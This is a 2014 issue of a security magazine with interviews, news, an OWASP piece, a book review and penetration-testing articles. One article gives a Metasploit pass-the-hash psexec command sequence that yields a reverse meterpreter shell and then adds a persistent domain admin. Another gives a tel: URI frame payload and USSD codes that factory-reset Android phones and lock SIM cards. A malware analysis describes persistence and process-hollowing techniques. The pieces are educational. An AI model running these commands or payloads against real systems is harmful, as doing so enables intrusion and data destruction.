security kaizen magazine, issue 13

Vol.4 Issue 13 March/April 2014

www.bluekaizen.org

EG-Cert 2013 Report & Statistics

Interview With Elearnsecurity.Com Founder

Ec Council University Review

Gulf Security Camp 20145-7 May

Dubai, UAE

www.securitycamps.com

ww

w.b

luek

aize

n.or

g

Cont

ents

Interview with Armando Romeo CEO and Founder of eLearnSecurity7

Mobile Application Security Book Review29

Master of Security Science (MSS) Course Review

31IDC CIO Summit 2014Event Review

33

9

Interviews

Reviews

Grey Box Penetration Testing Part 2

Killing Android Mobile SIM Cards Using USSD

Kazy Malware Analysis

3

15

17

21 Bluekaizen News

New & News Grey Hat

5 37Bluekaizen updatesEncrypting Windows Traffic Using IPSec

25 OWASP

27EG-Cert 2013 Report & Statistics

Interview with Mahmoud Nimer GM and Co-Founder of the multina-tional Start Link

Editor’s Note Best Practice

ww

w.b

luek

aize

n.or

g

Editor

Edito

r’s

Not

e

Issue 12 | Securitykaizen Magazine | 5

Since we are always looking for new ideas to enhance the usability and readability of the magazine, a new feature was added to our article templates starting from this issue. We added a QR code next to the article header so that you can scan it using any QR mobile reader and navigate to the appropriate article on our website, from there you can resume reading online, share it with friends, comment and get feedback from the author

Hello Dear Security Kaizen readers, this is the second issue for this year. I`ll go through the major changes quickly to keep you hooked up with the summary of achievements during that period. As you might`ve notice BlueKaizen website was updated and the whole theme changed, it`s in a current beta state now and should be stable by the end of April.

The magazine website is now embedded in it, enabling faster access to separate articles as we mentioned in our previous magazine issues. You can now browse the articles by issue, author, comment and rate on the articles enabling you to interact directly with the original author of the article. We`re still working with the authors regarding their credentials and access methods. Since it`s in its beta phase we`d be more than happy to receive all your suggestions and feedback about the new site at [email protected].

Tell us whether you like it more this way. Regarding the courses delivered, we handled many course with the highlights of CEH and CHFI resented by Adel AbdelMoniem and the IDS & Packet Analysis deep technical course prepared and delivered by Bluekaizen. We`re delivering many courses in the following months, you can check them out at sklabs.org. And for the surprise we`re launching Gulf Security Camp during 5-7 May, This will be the first time and hopefully not the last. We`ll also be launching a Camp at Alexandria in late June. Regarding the sessions we`ll be holding a session at Alexandria university at 15 March 10, 2014 introducing information security to the students there. We`re also presenting some hot topics at MUST university at 21 March 10, 2014 too.

For Advertisement In Security Kaizen

Magazine &

www.bluekaizen.org Website

[email protected]

OrPhone: +2 0100 267 5570

+971 56 95 40127

Security Kaizen is issued Bi-Monthly

Reproduction in Whole or part without written permission is strictly

prohibitedALL COPYRIGHTS ARE

PRESERVED TOWWW.BLUEKAIZEN.ORG

Chairman & Editor-in-ChiefMoataz Salah

EditorAdham Mohamed

ContributorsAhmed GoudaAhmed Saafan

Amr AminMohamed Abdel Latief

Mohamed Al FatehMohamed Zain

Website DevelopmentMariam Samy

Marketing CoordinatorMahitab Ahmed

DistributionMohamed Saeed

ProofreadingJeff Compton

Designed & PrintedMedhat A.Elbaky

01013126152

Magazine Team

ww

w.b

luek

aize

n.or

g


ww

w.b

luek

aize

n.or

g

Inte

rvie

ws

Can you please introduce yourself to security kaizen magazine readers?

i’m the CEO and founder of eLearnSecurity, Italian, living in Dubai. Prior to founding eLearnSecurity I’ve been involved in a number of security assessments for private and public companies and I’ve spent many years on web application security research, which has always been my area of interest in IT Security.

Can you give us a quick overview about eLearnSecurity? How it all was started and what brought You the idea?

ELearnSecurity has been founded in 2010 in Italy.At that time I felt there was so much to improve and innovate in the IT Security training field that, given mine and my team experience and passion for the field, not giving it a shot was a waste.Back then, me and other three renowned IT Security professionals joined forces to create a comprehensive training course on Penetration testing, the Penetration Testing course Professional, aka PTP.Releasing a new training course, being a completely unknown company, was quite a challenge.

Interview with Armando Romeo CEO and Founder of eLearnSecurity

WWW.Bluekaizen.org

We handled an interview with one of the famous security courses suppliers worldwide to expose the real nature and experience of the materials and content provided by eLearnSecurity.

Issue 12 | www.bluekaizen.org | 8

However it immediately gained press and stellar reviews from our students.From there we expanded our offerings to other areas such as Web Application Security, Reverse Engineering and Mobile Security. Today eLearnSecurity has clients in Fortune100, students from over 127 countries, offices in USA, Europe and Middle East and a team of talented professionals that doubles in number every year.

Why did you choose the online model for providing your courses instead of the normal face to face style?

The online model, when done properly, is not only the future of training but also an opportunity during the slow economy years we have been through in the past 5 years.Then let’s face it: the 5 days, 40 hours training, answers business needs more than rationality. No one will ever learn in a classroom as much as with an online course, with such a heavy load in such a short time. Not to mention that topics like Penetration testing are so complex that a teacher will hardly be able to convey theory along with practical sessions in only 40 hours.There certainly is a demand for classroom training but result is another story.So we decided to create a self-paced model where the student is provided with the course material in a handy dashboard, a proven path to follow and all the time required to study. We then allow students to interact with the instructor through forums in case they need further explanations.Moreover with on-demand labs, there’s plenty of time and flexibility to absorb the complex topics that we teach.

What is the most unique thing eLearnSecurity courses offer other than the other providers?

ELearnSecurity has never been a mere content production company.From day 1 we always focused our attention on how we could transfer practical skills between two persons effectively, by means of e-learning. We knew we had to do much more than just writing slides or recording videos.The way we achieved this goal is with the sophisticated virtual labs that we created: Coliseum, Hera and Hack.me. These are the most advanced virtual labs you will find on the subject.Coliseum allows to instantiate many different vulnerable web applications on the fly, within a sandboxed environment that ensures safe and exclusive access per user.

“Did u know that sklabs is the training division of Bluekaizen, they successfully ran many courses including Samurai WTF, Metasploit, CEH v8, CHFI v8 and plenty more”


What challenges do you face as a new security services provider in the market?

The market understands the value in our offering and doesn’t consider us new anymore.The main challenge for us is to continue to innovate while we are on such a high growth trajectory.

How do you face the challenge of Accreditation and certification especially when you face competitors with strong history like EC- Council and Sans Institute ?

Market understands the difference between certifications obtained by answering quizzes and certifications obtained by performing a 100% practical exam. All our

exams are practical. There is no way you can assess the proficiency of an IT Security professional by means of multiple choices quizzes.Our certified professionals not only have to perform an exam that recreates a real world pentest or assessment, but they also have to provide a commercial grade report.Professionals or Employers who hold our certifications know the value in their hands and do not really care about strong, or in some cases just long history in the field.Having that said, accreditation is important for us and it’s certainly something you would see coming in the near future.

Recently, you opened an office in Dubai, How do you see the potential in the Middle East Region?

Middle East is an exploding market for IT Security in general, where e-learning is still probably less widespread compared to other areas of the world. However we have witnessed an increased demand for our training even before we opened an office in Dubai.The investment we received from Middle East investment funds acknowledges our quality and innovative approach and will let us bring to market always better and more specialized offerings for governments, companies and individuals in this region.

Hera is a complex virtual lab in which you can spawn always new and diversified scenarios comprising networks, servers and workstations. Once again isolated and dedicated for each user.Both labs run on powerful datacenters using best of breed virtualization technology and we are now implementing these technologies for government bodies and corporations around the world.We have a R&D team that I believe no other training company in this field has, in number, budget and talent. In fact, 50% of our team doesn’t work on what we are offering today. It’s working on what we’ll be offering in 2-3 years. All the readers can have a taste of Coliseum technology by using Hack.me https://hack.me which is the only community driven, virtual lab on web application security. And it comes for free.

Among your provided courses, which are the most popular?

The most popular course so far is our WAPT: “Web Application Penetration Testing course”.Our newly launched MASPT, “Mobile Application Security and Penetration Testing” course has also gained a lot of interest by the community.

What is the range of prices for your courses and do you provide discounts for students?

Thanks to the automation and extreme attention to efficiency we manage to keep our costs down and we pass this advantage to our students providing courses from $399 to $999.

How do you make sure that the course content is effective and comprehensive?

We undergo long and cyclic reviews of our contents before and after a release.Before we release we invite researchers and professionals to review and provide feedback on our contents.After we release, we rely upon our students’ feedback to tweak and add more contents or better coverage when necessary.

From day 1 we always focused our attention on how we could transfer practical skills between two persons effectively, by means of e-learning


ww

w.b

luek

aize

n.or

g w

ww

.blu

ekai

zen.

org

Inte

rvie

ws

1. Can you please introduce your self to security kaizen magazine readers?

I am Mahmoud Nimer, General Manager and co-founder of StarLink. My role is to oversee the smooth operation of the value added distribution businessfrom sales, technical, channel, logistic and finance perspective.

2. Can you give us a quick overview about star link? And the products you provide?

StarLink, is a leading IT compliance and next-generation threat drivensolutions provider, recognized as a “Trusted Security Advisor”, and a True Value Added Distributor. StarLink today is present in 14 countries across the Middle East, Turkey and Africa regions with physical resources in each of these countries. The on-the-ground teams in each country offer sales, Pre-Sales and post-sales services across all products in StarLink’s portfolio to the Channel in that country, as required by Partners.

StarLink has a well-structured model of managing its portfolio of 18 vendors and has classified its vendors on the basis of Core, Emerging and Growth categories. The core category includes vendors like IBM Infosphere, Guardium, WWW.Bluekaizen.org

We had an interview with Mahmoud Nimer GM and Co-Founder of the multinational Start Link to give us an overview of the Corporate.

they align with StarLink , but they rest in the confidence knowing that StarLink will be able to provide their end-to-end expert capabilities to them, so that they can in turn deliver exactly what their customers need.

And to our customers, since StarLink’s business model is unique whereby we only sell through our channel, like a True VAD should do, but we als maintain Trusted Advisor direct relationships with all customers by consultatively selling to them to understand their business needs and then with our channel, map them to our solution areas, that cover compliance, next-generation threat protection, secure mobility or vulnerability management.

Furthermore, we also create opportunities for partners while simultaneously training and enabling the Channel so that Partners can go-to-market themselves. This significantly assists Partners to realize a quick return oninvestment when selling StarLink’s technologies, as they almost immediately start receiving qualified opportunities and are guaranteed opportunity protection when they align with StarLink. Value added services is also available to the regional channels like PR and communications, events, telemarketing, email campaigns, focused workshops, direct sales engagements alongside partners, technical presentations, product demonstrations, providing demo equipment, POC deployment, implementation, L1 support, L2 support. Of course all these are optional but are available to the entire channel, and are select-ed by the channel based on their need.

Dell Software, FireEye, SafeNet and Tripwire as these vendors have been in the region for several years now and are doing a multi- million dollar business. Vendors like Boole Server, Guidance Software, IronKey, Gigamon, BlueCoat, Titus, MobileIron have been in the market for couple of years form the emerging solutions category and under the growth solutions category new technology vendors like Bit9, CoreSecurity, IpSwitch, RedSeal Networks, and Venafi are grouped.This year StarLink has also categorized its solution portfolio into four solution areas like Access Control, Advanced Threat protection, Vulnerability Management and Secure Mobility, as a go to market strategy, where it provides an effective and easy approach for partners to sell to their customer base.

3. What differentiate star link from other security distributors?

StarLink’s vision for the Middle East, Africa and Turkeyvalue-added-distribution business is to continue bringing best-of-breed next-generation security technologies to the region, and most importantly to be a True VAD to vendors, partners and customers. What this essentially means is that to each party, StarLink operates like an extension of their team. For our ven-dors it means, many of them do not need to have any local presence at all because StarLink is able to offer end-to-end expertise for the vendors’ solutions includ-ing sales, Pre-Sales, implementation and support. To our partners, many do not have the resources or skill-set toposition, deploy or support all of the technologies that



4. What is StarLink’s channel strategy for the Middle East region?

StarLink’s channel strategy for the Middle East region is multi-faceted as we have 3 types of partners, and 18 vendors within our VAD portfolio. The 3 types of partners that we work with are defined as Strategic Partners, Partners and Resellers. The Strategic Partners are those that align very closely with us for multiple solutions within our portfolio and commit to revenue, as well as, invest in growing the business by allocating dedicated sales and technical resources to the partnership. They are essentially security focused large system integrators. Secondly, Partners, are usually security-focused VARs and security service providers that align with StarLink on one or more technologies, but do not usually commit to revenue goals and have a limited pool of resources to share across all vendors and distributors they work with. Lastly, the Reseller category covers organizations that are typically opportunistic and do not align on any specific technology area with StarLink, but maintain ad-hoc purchase relationships with us and they come to us when they identify opportunities in which StarLink’s products are required.

The company has also introduced the StarLink Choice partner programme aimed to reward partner success with targeted sales incentives and marketing programmes. We believe this will increase visibility and that of partners in the market, improve commitment to both Partners and Managed Partners, grow revenue and the profitability of partners, secure the tech investments that partners are making and challenge the competition.

5. How do you see the security market in Middle East and the emerging markets?

In 2008 the expected fallout was observed from the global recession due to which everyone experienced a slowdown, but the security market has been the complete opposite, infact for us, a spike. We are lucky and privileged to be in a space of the security market that has high barriers to entry, requiring strong expertise which we have invested in. Furthermore with the current threat landscape and compliance regulations impacting this region, the two main drivers for our business, we have experienced a positive revenue growthfor both StarLink and its channel partners over the past couple of years. We have also invested in emerging markets like sub Saharan Africa and Turkey.

These markets currently boasts a highly competitive economy based on the comprehensive integration of IT into all aspects of society and the economy, including smart infrastructure and effective service delivery.The effective uptake and utilization of IT have made a demonstrable impact on economic progress in these markets and there are clear indications of positive change on development. Hence a change in the IT landscape in these markets are observed, in terms of its maturity, the range of corporate and government projects, and the consumerisation of corporate IT use.As a result, a growing trend in “cyber threat” is observed, which is one of the biggest problems facing these markets because government and private sectors have yet not taken cyber security to the point where it is a priority.

6. Which sector is focusing more on security (financial, oil & gas, government or others?

As the Middle East is consistently becoming a hotspot for cyber war, which is very much evident by the high-profile breaches of key energy and government assets, its observed that in 2014, higher spends on Information security will be observed more in government sectors, focusing more on strengthening security for national information assets and protection of national frontline against cyber-attacks. Spending in other core verticals like banking and finance, telco, oil and gas, healthcare, education etc wil also be observed but not quite high as governments.


ww

w.b

luek

aize

n.or

g

Gre

y H

at

Grey-BoxPenetration Testing Scenario

Information Security Engineer

7. Go to the metasploit use psexec with pass-the-hash techniqueThe followWarm up your hands as we will capture the flag now. Run metasploit and use the psexec module as follow

Warm up your hands as we will capture the flag now. Run metasploit and use the psexec module as followmsf > use exploit/windows/smb/psexecmsf exploit(psexec) > set RHOST 192.168.100.10msf exploit(psexec) > set SMBDomain pentest.corp.localmsf exploit(psexec) > set SMBUser Administratormsf exploit(psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:f40b71a29d7723b7cb7e64a8d184dec4msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcpmsf exploit(psexec) > set LHOST 192.168.100.102msf exploit(psexec) > exploit

We’re resuming the grey box penetration test scenario from the last issue.

In this article you will learn how to fully compromise a domain environment without exploiting any vulnerability.


Gscamp is the first camp organized by Bluekaizen in the gulf area. Scheduled at 5 May.

Congratulations, you can see that pass-the-hash technique worked and we got reverse meterpreter session on the domain controller server

8. Post Exploitation and add new user and make it domain adminPost exploitation in penetration testing could be made by a lot of techniques and gather a lot of information about the network environment and could lead to more exploitation in the domain.

One of the most important steps after getting the meterpreter is to get the system privilege and migrate to a stable service.

In this section I will illustrate how to add a new account to the domain administrator to maintain your access to the pentest.corp.local domain In figure 5 you can see that I add a new user pentestAdmin to the domain. Then, I list all the groups inside this domain controller. Finally, I add pentestAdmin to the domain admins to maintain my access to the domain pentest.corp.local. Figure 5: post exploitation: add username to the domain users then add the user to the domain admins group

9. References 9.1. http://pkgs.fedoraproject.org/repo/pkgs/libesedb/libesedb-alpha-20120102.tar.gz/198a30c98ca1b3cb46d10a12bef8deaf/libesedb-alpha-20120102.tar.gz9.2. http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip9.3. http://www.ntdsxtract.com 9.4. https://raw.github.com/pentestgeek/metasploit-framework/master/tools/ntds_hashextract.rb

10. SummaryAll information in this article is from a real penetration testing scenarios. Some of steps in the article are strait forward; maybe it will need more skills to bypass some restrictions like the antivirus, host intrusion prevention system and firewalls.It is advised that the most important part of the penetration testing is the reconnaissance and mapping.The more information you get during the penetration testing activity means high possibility to capture the flag and compromise the network

Figure 5: post exploitation: add username to the domain users then add the user to the domain admins group


ww

w.b

luek

aize

n.or

g

Gre

y H

at

Killing Android Mobile SIM Cards Using USSD

What is USSD and what is it used for.- I’m sure that you have used USSD Code before? It’s the code that’s enclosed between the * and # characters - USSD stands for (Unstructured Supplementary Service Data) and is a session based GSM protocol unlike SMS or MMS. - Typically it’s used to send messages between a mobile phone and an application server in the network. Nowadays there are multiple Services based on USSD, such as:1. Mobile banking (Airtel Money in India, Vodafone money transfer in Kenia)2. Social networking (Facebook, twitter) 3. Updating mobile software over-the-air4. Pre-paid phone top-up and balance queries

Are you using a mobile phone that runs Android as an Operating system ... please note you are in danger and the danger will not affect just your mobile, including all its data but also the SIM card.Can you imagine that a single line of code embedded in a web page can be used to trigger a remote factory reset of some Samsung smart phones, including the Galaxy SI, SII, SIII and also the HTC One X running HTC Sensation (Ice Cream Sandwich), the Motorola Droid series and the Google Nexus series.

Senior Linux Systems Engineer


In this article, I will discuss how to play with USSD codes using different tools and how to exploit different services based on it. In addition, critical security issues in USSD based services such as virtual money transfer/mobile banking and social networking will be discussed, and last, I will discuss what exactly the term ‘dirty use of’ means.

USSD Architecture1. Architectural components:2. MSC (Mobile Switching Center),VLR (Visitor Location Register)3. USSD Gateway4. USSD application/server5. Simple Messaging Peer-Peer interface

What is the back door in Android OS: » The vulnerability is in the dialer itself ( ex: TouchWiz in Samsung devices ) it fails to differentiate between dialing a phone number and USSD codes » The web browser handles the “tel:” protocol, but as you know from above , the dialer can’t differentiate between calling numbers or USSD code » So simply, the device can be forced automatically to open a link to such a page by touching a NFC-enabled phone to a rogue NFC tag, opening wap push messages, scanning a QR code or by including the link in a special service message. However an attacker can also include the link in a Twitter feed, MS or an email message and trick the victim to manually click on it.

5. How this vulnerability can be used as an attack: 1. Apparently it can also be triggered from a browser like this: <frame src=”tel:<insert the ussd code here>%23” />Examples of USSD code which can be used on Samsung devices

a. Reset to Factory Settings : *#7780#b. Full Factory Settings : *2767*3855# (Factory Hard Reset to ROM firmware default settings)c. Factory Data Reset *#*# *#7780#*# (Clears Goog-le-account data, system and program settings and installed programs. System will not be deleted, and OEM programs, as well as My Documents (pictures, music, videos))

2. QR Code to enforce the Mobile to run the USSD Code which injected in the link (you could also use www.goo.gl to change the URL) 3. Near field communication (NFC) victim can only see the show, can’t stop it (Galaxy SIII vulnerability can be exploited)4. Wap push message also to open a link that is injected

To burn the SIM card » In a normal situation you can change a Pin code (**05*1234545*1234*1234#) but if 3 wrong pins are entered, à Sim card gets locked and will ask for a PUK code» 10 wrong PUK codes will kill the SIM card forcing you to buy a new one. How to prevent the USSD attack: 1. Install Telstop from the Google play store. This tool will mitigate the USSD attack by publishing a URI handler for TEL. Every time a TEL URI is activated an application selector will be shown.Or2. Install Dialer One as an alternate dialer for your android devices. A tel: URL will now prompt for the application to use.


ww

w.b

luek

aize

n.or

g

Gre

y H

at

Kazy MalwareAnalysis

FILE INFROMATION• File size: 241 KB• MD5 : b1b7854b73f06e7a18093e221373b8ba• Type: Win32 EXE• Publisher: Igor Pavlov• File Version: 9.20• VirusTotal Detection Ratio: 35 / 46

Tools To analyze this malware I used Reflector decompiler to convert the .Net assembly; Microsoft Intermediate language (MSIL) into C# code; and used it as a plug-in for Visual Studio 2010 in order to debug the .Net code.

InfectionIn this attack scenario, the victim visited a malicious website that requires running a java applet. The applet is malicious; it will download an executable and then will execute it on the system. The executable is a .Net executable that acts as a launcher/loader to an embedded executable.

In this article I will summarize an attack scenario and I will focus on the malware part used to compromise the victim’s machine.

Malware Analyst at EG CERT


IntroductionThis malware is highly obfuscated to hinder understanding the code after decompilation. The malware is multithread and each thread is responsible for a certain feature in the malware for example there is a thread responsible copying the malware into USB thumb drives attached to the system.

.NET Original MalwareThe malware will load a resource embedded within itself into memory. The loaded resource is a DLL; also .Net. As shown in figure (1). The malware will call a function called Load from cd16d48d9739242e0c6315b0fb2fb86b3 class. As you can see the malware used obfuscator to make the analysis harder which made the name of the classes and variables very long and also embeds branches that will not be executed to make code reviewing harder.

Figure (1)

The malware will use AppDomain.Load(Byte[]) .net function to load it as a DLL in the context of the running malware. The malware calls into the newly loaded module through calling InvokeMember function which will call a certain function inside the module and I will refer to it as “MainThread”.

Main ThreadThe main thread is responsible for initializing the other threads, create a copy of itself in the ApplicationData directory in the system and will create a registry key that will ensure it will start after rebooting the system.The main Thread calls a function called A!A.A.AddToStartup(string RegistryKey, string RegistryName, string TempFileName, string TempFileContent, string Extension).

This function as implied from its name will create a registry key named “Upadate” in this path of the registry “HKCU\\ Software\\Microsoft\\Windows\\CurrentVersion\\Run” to initialize the malware after rebooting the system using Win32.RegistryKey.SetValue function.But before the call to AddToStartup ,The function will call string.Concate function to generate a path, The first string is the absolute path of ApplicationData, the second string is the word “\\Adobe”, and the third string is a randomly generated number between(9,999) and the final string “.exe” and then the malware will call System.IO.File.Copy to copy the malware to the newly generated path and set its attributes to be hidden.The malware then starts to create the other threads; it starts with instantiating a Thread object, then calling Thread.start function.

I will discuss now the function of each thread created by the main thread.

USB Thread

Persistance Thread

MainThread

Block Thread

Loader Thread

sumeThread to continue the execution in the malware code written. So the backdoor is now executed on the system.

Block ThreadThe second thread is the Block thread which is simply used to check if the malware is executing in a certain sandbox environment or not. It first gets all running processes in the system using Process.GetProcesses function and then compares the name of the process-es to “sandboxierpcss”. And if found it will exit.

USB ThreadThe Third thread is USB thread which is used to copy the malware into all attached USB drives in the system.The thread will call System.IO.Directory.GetLogicalDrives() to get all currently available disk drives and will create a path of “Drive:\\rundll32.exe” to copy the malware with this name into the drive and then will create another file “autorun.ini” and using FilePut function to write “[autorun]\r\nshellexecute=rundll32.exe” so when any user connects its usb flash into his computer the malware will automatically execute and infect his system as well. It worth mentioning that both files are created and then using SetFileAttribute func-tion to make the files hidden.

Persistence threadThe final thread is the Persistence thread which is used to ensure that there is a registry key in the RUN to make sure that the malware will start after each reboot. The malware checks first, if the registry key already exists or not by calling A!A.A.CheckKey() function to check if the key is already existing and if not it will call the early mentioned function A!A.A.AddToStartup in the main thread to add a registry key in the “HKCU\\ Software\\Microsoft\\Windows\\CurrentVersion\\Run”.

Loader ThreadFirst the Loader Thread, This thread is responsible for injecting a malicious code (another malware) and run it on the victim’s machine. It first reads the original malware as string, and then it will decode certain part of it and then decrypt it the resulting data is a hidden malware. I uploaded the resulting malware to VirusTotal and some of the AVs identified the resulting malware as “Andromeda” Backdoor. I analyzed this peace of malware and I could give some information about it in another article.

The Loader thread will read the malware file as a string using System.IO.File.ReadAllText (string malwarePath) .Then a call to split string is made using a specific delimiter, the ascii representation of the delimiter is “VfBOBnPkjMHYKOnOZT”. The output of the split was 14 elements array. One of these elements will be used as key in the decryption process of another element in the same array. It turns out that this is another malware that will be injected in another running process.

I will present you with the most important elements. The second element was the key used in the decryption process and here is the ascii representation of it “ksGhCgFWiXUOgdzjuBwIZavw”, The 6th element “Process” string which is the name of the process that malware will launch in suspended state and then inject the malicious code into it. 13th element is the content of the malware in the encrypted form. Figure (2) shows the malware in hex editor to highlight the delimiter.

Then the program will then decode the 13th element of the array using Base64 function and then it will decrypt it with the second element in the array “ksGhCgFWiXUOgdzjuBwIZavw” using a function called PolyDecrypt. As shown in figure (3).

The result of PolyDecrypt function is a byte [] which is actually the backdoor payload that this malware is trying to execute on the victim’s machine. The malware will call a function called inject (byte [] PolyDecryptOutput, string virusName).

The malware is using a systematic technique used by malware authors. It is called process replacement, first it starts a process in suspended state; in our case it will start a copy of vbc.exe which is the visual basic compil-er which is part of the .Net framework; and then using UnMapViewOfSection to remove any data in the origi-nal process starting from the image base and then us-ing VirtualAllocEx and WriteProcessMemory it writes its code instead and finally use SetThread Context to Re-


Prepared by Ahmed Mashally

ww

w.b

luek

aize

n.or

g

News Reporter

New

& N

ews

NSA and British Agency is Spying on You via Angry Birds Game App

A Peek Under The Hood To The Recent Security Breaches

Smart phone applications such as Google Maps, Face book, Twitter, Flickr and games like Angry Birds are the biggest sources of information for NSA. Intelligence agencies use these apps to track locations, access address books, buddy lists, phone logs and collect personal data such as age, gender and other personal details according to the latest documents have leaked by Edward Snowden

News


Foursquare vulnerability leaking 45 million users’ email addresses

According to a Penetration tester, Jamal Eddine, an attacker can extract email addresses of all 45 million users just by using a few lines of scripting tool. In July 2013 similar vulnerability was reported on Facebook (discloses the primary email address ).

Millions of Germans emails have been hacked

The country’s Federal Office for Online Security (BSI) said that 16 million accounts had been compromised. The BSI refused to give details on the source of the information, and advised victims to digitally clean their computer and change access to their online profiles.

Bluetooth Skimmers lead to $2 Million at gas station

A group of hackers had stolen banking information using Bluetooth enabled Credit Card Skimmers planted on the gas stations throughout the Southern United States and They made more than $2 Million by downloading the ATM information, as well as PIN numbers.


Syrian Electronic Army’s official website hacked by Turkish Hackers

A group of Turkish hackers (@Turkguvenligi) on twitter hacked and defaced the official website of high pro-Bashar Assad Syrian Electronic Army. The hacked link belongs to leak section, which is used by SEA to publish sensitive data. SEA has confirmed that their site was targeted but the home page was not affected.

‘Java Bot’ A cross-platform malware running on Windows, Mac and LinuxSecurity researchers at Kaspersky discovered a cross-platform malware which running on Windows, Mac and Linux. The malware is completely written in Java and once the bot infects a system, it copies itself into user’s home directory as well as add itself to the auto start programs and this bot has appeared as one of the sources of (DDOS) attacks.

OpIsraelBirthday will be a Massive Cyber Attack against Israel on 7 April 2014

The online hacktivist AnonGhost along with a group of hackers decided to attack Israeli cyber space on 7th of April when the country will be celebrating its birthday. This cyber attack will be conducted under the banner of #OpIsraelBirthday in which every possible Israeli website will be a target in order to show their solidarity with Palestine.


Microsoft employees’ emails hacked by Syrian Electronic Army

Microsoft has confirmed that in addition to its official Twitter account, email accounts of its employees were also compromised by SEA, A Microsoft spokesperson said that “A social engineering method known as phishing resulted in a small number of Microsoft employee social media and email accounts being impacted. Accounts were reseted and no customer information was compromised “.

Egyptian penetration tester discovered PHP code injection Vulnerability in YahooEbrahim Hegazy (A Web application penetration tester) has discovered a critical remote PHP code injection vulnerability in the Yahoo website that could allow hackers to inject and execute any php code on the Yahoo server and yahoo immediately fixed the issue after getting the notification from the researcher.

Google announces more than two million dollar reward for hacking Chrome OS

Google has announced the Pentium hacking contest for hacking Chrome OS. The event will be held at a Canadian security conference (CanSecWest, Vancouver 2014) on March 12. The firm will also shell out a massive $2.7 million (total reward) for the individual and team winners but the contest is unfortunately not available for residents of Italy, Brazil, Quebec, Cuba, Iran, Syria, North Korea and Sudan.


ww

w.b

luek

aize

n.or

g

OWASP Cairo Chapter Leader

New

& N

ews

OWASP’s Mission and Core ValuesOWASP’s mission is to make software security visible, so that individuals and organizations worldwide can protect themselves and make informed decisions about software security risks. Since its creation, OWASP always followed and supported 4 main values:

1. OPEN: Everything at OWASP is totally transparent from finances to code.

2. INNOVATION: OWASP encourages and supports innovation/experiments for solutions to software security challenges.

3. GLOBAL: Anyone around the world is encouraged to participate in the OWASP community.

4. INTEGRITY: OWASP is an honest and truthful, neutral, global community.

What is OWASPThe Open Web Application Security Project (OWASP) is a worldwide non-profitable charitable organization focused on improving the security of software. The OWASP community includes corporations, educational organizations, and individuals from all over the world. These communities work to create articles, methodologies, documentation, tools, and technologies and make them freely available to everyone to use and benefit from. OWASP does not endorse or recommend commercial products or services, allowing the OWASP community to remain vendor neutral with the collective wisdom of the best minds in software security worldwide. All OWASP expenses are covered by confer-ences, memberships, corporate sponsors and banner advertisements.


OWASP Project Inventory OWASP’s projects cover many aspects of application and software security. The main purpose of the projects is to create documents, tools, teaching environments, guidelines, checklists, and other materials to help organizations improve their capabilities to produce secure code. OWASP currently has over 142 active projects, and new project applications are submitted every week.

All OWASP tools, document, and code library projects are organized into the following categories:

• Incubator Projects: it is the experimental playground where projects are still being flushed out, ideas are still being proven, and development is still underway.

• Lab Projects: They produce an OWASP reviewed deliverable prototypes, while they are still not production ready.

• Flagship Projects: The OWASP Flagship designation is given to projects that have demonstrated superior maturity, established quality, and strategic value to OWASP and application security as a whole.

OWASP Top TenOne of the main Flagship projects owned by OWASP is the Top Ten project. The project’s main purpose is to represent a list of the most critical web application security flaws and their possible solutions. The project provides powerful awareness documentation for web application security. Project members include a variety

of security experts from around the world who have shared their expertise to produce this list. The 2013 top ten is available in Arabic in addition to many other languages.

How to participateAre you an application developer? Are you a security researcher? Do you have an idea but just need contributors to make it reach the real word? Everyone is free to participate in OWASP and all of the materials are available under a free and open software license. OWASP global group of volunteers are over 36,000 participants. If you want to be part of the OWASP community, you have one of the following three options:

• Join a project: This is the most popular division of OWASP as it gives members an opportunity to freely test theories and ideas with the professional advice and support of the OWASP community. Everyone is welcomed to contribute to any of OWASP’s open projects.

• Edit a page: OWASP is a wiki; there are thousands of active wiki users around the globe who review the changes to ensure quality. If you see a page that needs some clarification or better information then you are welcome to edit it.

• Global Initiatives: The OWASP Global Initiates program was established to provide easy access for volunteers interested in contributing in OWASP. There are a variety of items that need volunteers.

OWASP Egypt ChapterTo be part of these worldwide active projects and to transfer all this knowledge and experience to the Egyptian application security industry, the Egyptian Chapter of OWASP is here to be the starting point for all the Egyptian contributors to be part of the OWASP projects and to benefit from the local and international expertise in this field.

Attending our chapter meetings is FREE and OPEN to anyone; OWASP membership is NOT required to do so. The Egyptian Chapter will have bi-monthly meetings. So simply sign up on the mailing list, watch for the next meeting, stop by to introduce yourself, ask questions and collaborate. The Egyptian Chapter’s opening meeting will be held at ITI in April. New ideas will be discussed and groups will be created to work on actual projects. Also away from the regularly meetings, educational workshops will be held to make real benefit for all the contributors.



ww

w.b

luek

aize

n.or

g

Senior Application Security and Data Protection Consultant

Revi

ews

Mobile Application Security is a super technical book. The authors are three mobile security veterans from iSec Partners, a reputable mobile security services company with several mobile 0days and Blackhat talks. They focus on the mobile threat landscape from a developer’s perspective; shedding light on mobile development security concepts and secure coding tips that most developers overlook. The book is split into two main parts, one describing the security architecture for the different mobile platforms and how it can be used to develop secure mobile applications, and the other illustrating some of the common mobile services, their attack vectors, history of attacks, and the lessons learned from them.

Book Review

Mobile Application Security


At the end of the book :the appendices provide excellent tangents with one appendix on the anatomy of major mobile malware outbreaks and the other detailing tools that can be used in mobile security testing, static and dynamic analysis, fuzzing, and network manipulation.

As expected from a developer oriented book, it is coherently written with a formal scientific style that is sometimes mixed with technical whimsy. The language of writing is very clear and unambiguous. Very often code snippets and detailed command line steps are included to elaborate the secure way of developing a certain feature or using some tool. Also, having vast knowledge of community driven available tools, the authors provide instructions and links to related tools on many occasions; which I find to be a big advantage since quality tools in this area are scarce and hard to find.

On the downside : although the book covers Android, Blackberry, iOS and Windows Mobile application security practices very thoroughly, the 2010 publishing date means that it’s missing some of the most recent changes in the covered platforms. For example, the book was published before Blackberry v10 and Windows Phone v8 were released, so the book does not include information on them. Also, major security enhancements have been added to iOS v7 and Android v4.4 which were also released after the publishing date. However, the book offers a solid understanding of concepts and practices that, with adequate research, could be extrapolated and applied to more modern versions. Additionally, the book lacks differential analysis. There is no comparative background tone through most parts, so it’s left to the reader to identify the differences between the security implementation and features of the discussed platforms.

Overall, I think it is a very good read. The guidance of this book has helped me better shape a unified methodology for mobile application security assessment and penetration testing. I strongly recommend it for developers of security-critical mobile applications and mobile application penetration testers.

